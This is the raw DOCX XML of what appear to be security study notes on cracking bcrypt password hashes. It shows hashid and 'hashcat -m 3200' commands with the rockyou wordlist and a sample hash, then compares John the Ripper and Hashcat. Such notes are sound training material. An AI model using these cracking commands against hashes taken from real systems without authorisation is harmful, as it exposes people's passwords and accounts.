        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DE4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DE5">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bcrypt:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DE6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="641"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you have something like</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> $2a$ </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$2y$</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or any character instead of a or y, then you likely have bcypt. This is code -m 3200 for hashcat</w:t>
      </w:r>
    </w:p>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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Say you have a hash like $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DE9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DEA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First find the type of hash:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DEB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="520"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hashid '$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="520"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure to put the hash around quotes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="520"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It will give you a list of possible hashes. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DEE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="520"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or use this </w:t>
      </w:r>
      <w:hyperlink r:id="rId621">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">website </w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DEF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DF0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then find the code that hashcat uses for that hash type:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="832"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hashcat --help | grep "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hashname</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DF2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="832"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace hashname with the hash type</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DF3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DF4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then use hashcat with that code:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DF5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1485"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hashcat -m </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3200 '&lt;INSERT HASH&gt;'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1485"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace 3200 with you code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DF7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1485"/>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&lt;INSERT HASH&gt; </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">with your hash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DF8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1485"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure to keep the single quotation marks around the hash instead of double quotes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DF9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1485"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hashcat -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1485"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use this if you have hashes saved in hashes.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DFB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DFC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is what output looks like when it's cracked:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DFD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4205288" cy="2450563"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="376" name="image363.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image363.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId622"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4205288" cy="2450563"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DFE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DFF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you ever want to revisit a hash, do the same hashcat command but just append </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--show</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> at the end:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E00">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="409"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hashcat -m </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3200 '&lt;INSERT HASH&gt;'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /usr/share/wordlists/rockyou.txt --show</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E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02">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E03">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ebuy90mcvw0t" w:id="253"/>
      <w:bookmarkEnd w:id="253"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">John the Ripper vs. Hashcat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E04">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E05">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hashcat and John the Ripper (JtR) are two of the most popular password cracking tools that automate this process. In general, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">JtR </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is more of a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CPU-based cracking tool</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which also supports GPUs, while </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hashcat </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is mainly a</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> GPU-based cracking tool</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> that also supports CPUs. JtR can be run without any additional drivers using only CPUs for password cracking. Hashcat requires</w:t>
      </w:r>
      <w:hyperlink r:id="rId623">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId624">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">OpenCL</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or</w:t>
      </w:r>
      <w:hyperlink r:id="rId625">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId626">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">CUDA</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the GPU cracking process. For most algorithms, a GPU is much faster than a CPU since modern GPUs contain thousands of cores, each of which can share part of the workload. However, some slow hashing algorithms (like</w:t>
      </w:r>
      <w:hyperlink r:id="rId627">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId628">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">bcrypt</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) work better on CPUs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E06">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E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08">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E09">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E0A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_h307vitdamef" w:id="254"/>
      <w:bookmarkEnd w:id="254"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hashing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E0B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E0C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When using echo, it's important to use "-n" flag.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E0D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
